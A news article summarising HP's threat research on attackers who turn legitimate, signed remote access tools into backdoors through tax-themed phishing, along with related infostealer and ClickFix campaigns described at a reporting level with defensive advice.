Business as Usual: How Attackers Are Turning IT Tools Into Backdoors
Cybercriminals are installing genuine, vendor-signed remote access software on victims' computers and quietly enrolling those machines into accounts they control, turning legitimate IT tools such as LogMeIn and ScreenConnect into persistent backdoors, according to research published by HP Inc.
The findings, set out in the company's latest Threat Insights Report, document campaigns in which attackers abandoned conventional malware in favour of trusted applications, leaving defenders with few of the signals they normally rely on to separate an intrusion from ordinary system administration.
The shift matters because it inverts the assumption underpinning most endpoint defence. Security tools are built to flag the unfamiliar: the unsigned binary, the connection to an untrustworthy domain, the executable that behaves unlike anything a legitimate user would run.
The campaigns analysed by HP Threat Research, drawn from telemetry covering January to March 2026, deliberately strip those signals away. The installed software is legitimate, the installer is signed, and the network traffic flows to the vendor's own infrastructure. The only malicious element is the question of who holds the account at the other end, which is precisely the kind of detail that endpoint tooling is not designed to interrogate.
The intrusion that looks identical to IT support
In the campaigns HP documented, attackers did not tamper with the remote access applications at all. They distributed the official installers and enrolled victim devices into accounts they themselves controlled, which allowed the activity to run over legitimate vendor infrastructure. That choice removed the indicators conventional malware tends to leave behind, and it meant a compromised machine connecting to LogMeIn looked no different from a corporate laptop being managed by a help desk. The approach also sidestepped one of the most reliable triggers for a security alert, the moment a program reaches out to a domain or address with no established reputation, because here the destination was a trusted vendor that thousands of legitimate businesses contact every day.
Patrick Schläpfer, Principal Threat Researcher at HP Security Lab, said the design of these campaigns was what set them apart. “What stands out in these campaigns is how easily legitimate remote access tools are being turned into entry points for attackers,” he said. “By combining trusted software with carefully designed social engineering – tied to events like the end of the tax year – it's getting even harder to distinguish what can and can't be trusted.” The timing was not incidental. Attackers built their lures around the year-end filing period, when individuals and businesses are gathering documents, submitting returns and paying tax bills, and when an email promising a secure way to transfer sensitive tax paperwork carries an air of routine rather than risk.
How the lure unfolds on the victim's screen
The campaigns reached users through phishing emails carrying PDF attachments that claimed to offer a secure document transfer. Opening the PDF directed the recipient to a webpage that appeared to load a document while quietly initiating the download of a password-protected archive, with the password supplied inside the original PDF so that gateway scanners could not easily inspect the contents before delivery. Inside the archive sat a VBScript file labelled as a tax summary, and opening it began a largely automated installation chain that fetched the final payload and requested the elevated privileges needed to complete the install through a standard User Account Control prompt, the kind a user clicks past without much thought.
What the user saw was reassuring by design. While the installer ran in the background, the script opened a browser page displaying a pre-generated tax document, giving the impression that the expected file had loaded as intended. The payload, in one case, was the official LogMeIn client, signed and legitimate. Attackers used command-line parameters to suppress the prompts that would normally announce that remote access software was being installed, and once the tool connected to the vendor's infrastructure under the attacker's account, it pulled down further components to survey the machine, checking patch levels, identifying installed security products and opening the door to browsing files or deploying additional tools. HP Threat Research observed the same remote access abuse outside tax-themed phishing, with attackers also using fake software-update prompts that claimed a user needed a newer version to view a document, alongside bogus desktop versions of mobile or command-line apps, including fake dating websites, spread through search engine poisoning and malvertising to push the same class of software onto victims.
The wider pattern of attacks engineered to read as normal
The remote access campaigns were the clearest example of a broader theme running through the quarter. HP also documented fake cryptocurrency wallet recovery tools that claimed to help users locate lost wallets but instead harvested credentials, wallet data and system information before packaging it for exfiltration, in one case routing the stolen files out through a Discord webhook to spare the attacker the trouble of running dedicated command-and-control infrastructure. Shared through code-sharing platforms and media download sites, the emoji-filled infostealer scripts bore the hallmarks of AI-assisted “vibe coding,” and researchers found GitHub repositories reusing the same wallet-recovery decoy to distribute other stealers. The attack traded on desperation, since users hunting for a way to recover lost funds proved more willing to run an unfamiliar script that seemed to offer a direct fix to a high-value personal problem.
A separate strand of activity used ClickFix campaigns that disguised malware as audio files, walking victims through realistic CAPTCHA prompts on polished fake websites that copied a malicious command to the clipboard and instructed the user to run it. The downloaded file carried an extension associated with audio but in fact held script code, part of a layered chain that concealed an encoded PowerShell command and a further disguised download before reaching its payload. That chain delivered Amatera Stealer, an information stealer that targets credentials, browser cookies and cryptocurrency wallet data and can pull down follow-on payloads, including NetSupport, a legitimate remote management tool that attackers abuse to seize control of infected endpoints. Across the quarter, executable files were the most common malware delivery type at 39%, followed by archives at 38% and PDF documents at 10%, and at least 11% of email threats identified by HP Sure Click slipped past one or more email gateway scanners.
Alex Holland, Principal Threat Researcher at HP Security Lab, said the common thread was how unremarkable the activity appeared from the inside. “These attacks don't look like break-ins – they look like business as usual, blending in with normal IT activity and avoiding the warning signs associated with malware,” he said. He argued that the answer lies in narrowing what attackers can do once a lure succeeds rather than relying solely on spotting them at the door. “To secure the future of work and reduce risk, organisations should restrict unnecessary privileges, control software installation, and isolate risky activity such as downloads and unknown links,” Holland said. “Detection alone is not enough when legitimate tools are being turned into backdoors.” For defenders, the report's underlying message is that the boundary between trusted and malicious software has become a question of context and ownership rather than code, and that the controls best suited to this shift are those that limit privilege and contain risky activity before an attacker can build on a foothold.
